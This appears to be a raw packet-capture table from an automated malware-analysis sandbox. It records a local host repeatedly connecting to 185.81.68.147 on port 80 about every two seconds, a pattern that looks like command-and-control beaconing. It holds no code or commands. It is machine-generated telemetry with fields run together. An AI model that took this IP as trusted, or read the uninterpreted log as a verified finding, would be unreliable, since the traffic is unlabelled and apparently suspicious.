                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.133600950 CET4991480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.134797096 CET4991480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.246831894 CET4992080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.254870892 CET8049914185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.366853952 CET8049920185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.366939068 CET4992080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.367005110 CET4992080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.486884117 CET8049920185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.487035990 CET4992080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:01.606789112 CET8049920185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:02.968086958 CET8049920185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:02.968342066 CET8049920185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:02.968417883 CET4992080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:02.969827890 CET4992080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:03.074970007 CET4992580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:03.090434074 CET8049920185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:03.194948912 CET8049925185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:03.195076942 CET4992580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:03.195141077 CET4992580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:03.314976931 CET8049925185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:03.315094948 CET4992580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:03.434883118 CET8049925185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:04.829879045 CET8049925185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:04.829921961 CET8049925185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:04.830015898 CET4992580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:04.846349955 CET4992580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:04.966300011 CET8049925185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:04.968204021 CET4992780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:05.088300943 CET8049927185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:05.088375092 CET4992780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:05.088469028 CET4992780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:05.208355904 CET8049927185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:05.208494902 CET4992780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:05.328185081 CET8049927185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.616945028 CET8049927185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.616985083 CET8049927185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.617089987 CET4992780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.618360996 CET4992780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.730947971 CET4993380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.738116980 CET8049927185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.850821972 CET8049933185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.852617025 CET4993380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.852617025 CET4993380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.972481012 CET8049933185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:06.972628117 CET4993380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:07.093599081 CET8049933185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.487099886 CET8049933185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.487143993 CET8049933185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.487211943 CET4993380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.488637924 CET4993380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.590307951 CET4993980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.608465910 CET8049933185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.710300922 CET8049939185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.710467100 CET4993980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.710604906 CET4993980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.830476046 CET8049939185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.830559969 CET4993980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:08.950391054 CET8049939185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.340560913 CET8049939185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.340581894 CET8049939185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.340696096 CET4993980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.512900114 CET4993980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.633387089 CET8049939185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.637134075 CET4994180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.756931067 CET8049941185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.757004023 CET4994180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.757055044 CET4994180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.876732111 CET8049941185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.876784086 CET4994180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:10.996646881 CET8049941185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.325468063 CET8049941185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.325614929 CET8049941185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.325684071 CET4994180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.326936960 CET4994180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.433963060 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.446667910 CET8049941185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.553956985 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.554120064 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.554178953 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.674069881 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.674141884 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:12.794044018 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.161127090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.161201954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.161268950 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.162790060 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.277735949 CET4995280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.282532930 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.397746086 CET8049952185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.397886992 CET4995280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.397943020 CET4995280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.517937899 CET8049952185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.518105030 CET4995280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:14.638197899 CET8049952185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.025187016 CET8049952185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.025253057 CET8049952185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.025331020 CET4995280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.026737928 CET4995280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.137125969 CET4995880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.146631002 CET8049952185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.260946035 CET8049958185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.261126995 CET4995880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.261149883 CET4995880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.381108999 CET8049958185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.381238937 CET4995880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:16.501097918 CET8049958185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:17.717252970 CET8049958185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:17.717269897 CET8049958185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:17.717355967 CET4995880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:17.722091913 CET4995880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:17.827931881 CET4995980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:17.844971895 CET8049958185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:17.947917938 CET8049959185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:17.948074102 CET4995980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:17.949527025 CET4995980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:18.069458008 CET8049959185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:18.069514990 CET4995980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:18.189513922 CET8049959185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.543370962 CET8049959185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.543406010 CET8049959185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.543514967 CET4995980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.544858932 CET4995980192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.652868986 CET4996580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.664786100 CET8049959185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.772898912 CET8049965185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.772999048 CET4996580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.773061991 CET4996580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.892927885 CET8049965185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:19.893203020 CET4996580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:20.013297081 CET8049965185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.402214050 CET8049965185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.402250051 CET8049965185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.402319908 CET4996580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.405002117 CET4996580192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.512068987 CET4997180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.524835110 CET8049965185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.632217884 CET8049971185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.632332087 CET4997180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.632390976 CET4997180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.752470970 CET8049971185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.752568960 CET4997180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:21.872378111 CET8049971185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.235625982 CET8049971185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.235651970 CET8049971185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.235761881 CET4997180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.244251966 CET4997180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.355794907 CET4997380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.364161015 CET8049971185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.475790024 CET8049973185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.475895882 CET4997380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.476073027 CET4997380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.595813990 CET8049973185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.595896006 CET4997380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:23.717624903 CET8049973185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.083667994 CET8049973185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.083690882 CET8049973185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.083756924 CET4997380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.085223913 CET4997380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.199567080 CET4997880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.204968929 CET8049973185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.321373940 CET8049978185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.321495056 CET4997880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.321567059 CET4997880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.441628933 CET8049978185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.441807985 CET4997880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:25.561939955 CET8049978185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:26.935523987 CET8049978185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:26.935594082 CET8049978185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:26.935671091 CET4997880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:26.937257051 CET4997880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:27.043334007 CET4998480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:27.057161093 CET8049978185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:27.163141012 CET8049984185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:27.166419983 CET4998480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:27.166503906 CET4998480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:27.286264896 CET8049984185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:27.286344051 CET4998480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:27.406389952 CET8049984185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:28.774173975 CET8049984185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:28.774262905 CET8049984185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:28.774442911 CET4998480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:28.775974035 CET4998480192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:28.887151957 CET4999080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:28.895874977 CET8049984185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:29.007122993 CET8049990185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:29.007217884 CET4999080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:29.007385015 CET4999080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:29.127480030 CET8049990185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:29.127536058 CET4999080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:29.247433901 CET8049990185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:30.638452053 CET8049990185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:30.638586044 CET8049990185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:30.638647079 CET4999080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:30.648890018 CET4999080192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:30.764647007 CET4999180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:30.768640995 CET8049990185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:30.884495020 CET8049991185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:30.884646893 CET4999180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:30.902812004 CET4999180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:31.022821903 CET8049991185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:31.022902966 CET4999180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:31.142818928 CET8049991185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.377547979 CET8049991185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.377568007 CET8049991185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.377626896 CET4999180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.378925085 CET4999180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.480819941 CET4999780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.500231981 CET8049991185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.602041006 CET8049997185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.602114916 CET4999780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.602201939 CET4999780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.723808050 CET8049997185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.726351976 CET4999780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:32.847476006 CET8049997185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.298784018 CET8049997185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.298808098 CET8049997185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.298998117 CET4999780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.300307989 CET4999780192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.402692080 CET5000380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.420010090 CET8049997185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.522597075 CET8050003185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.522763968 CET5000380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.522813082 CET5000380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.643100023 CET8050003185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.643224001 CET5000380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:34.763016939 CET8050003185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.134424925 CET8050003185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.134485960 CET8050003185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.134547949 CET5000380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.151918888 CET5000380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.265976906 CET5000880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.271648884 CET8050003185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.385869026 CET8050008185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.385941029 CET5000880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.394293070 CET5000880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.514416933 CET8050008185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.514477015 CET5000880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:36.634377003 CET8050008185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:37.992120028 CET8050008185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:37.992219925 CET8050008185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:37.992305040 CET5000880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:37.993619919 CET5000880192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:38.105778933 CET5001180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:38.113373995 CET8050008185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:38.225619078 CET8050011185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:38.225693941 CET5001180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:38.225749016 CET5001180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:38.345577002 CET8050011185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:38.345653057 CET5001180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:38.465387106 CET8050011185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:39.908277035 CET8050011185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:39.908324957 CET8050011185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:39.908500910 CET5001180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:39.925919056 CET5001180192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:40.030776024 CET5001680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:40.045893908 CET8050011185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:40.150675058 CET8050016185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:40.150829077 CET5001680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:40.150902033 CET5001680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:40.270975113 CET8050016185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:40.271044970 CET5001680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:40.391025066 CET8050016185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:41.746231079 CET8050016185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:41.746301889 CET8050016185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:41.746397018 CET5001680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:41.747781992 CET5001680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:41.855984926 CET5002280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:41.867590904 CET8050016185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:41.976010084 CET8050022185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:41.976172924 CET5002280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:41.976172924 CET5002280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:42.095989943 CET8050022185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:42.096056938 CET5002280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:44:42.216063976 CET8050022185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.588996887 CET8050022185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.589023113 CET8050022185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:44:43.589200974 CET5002280192.168.2.10185.81.68.147
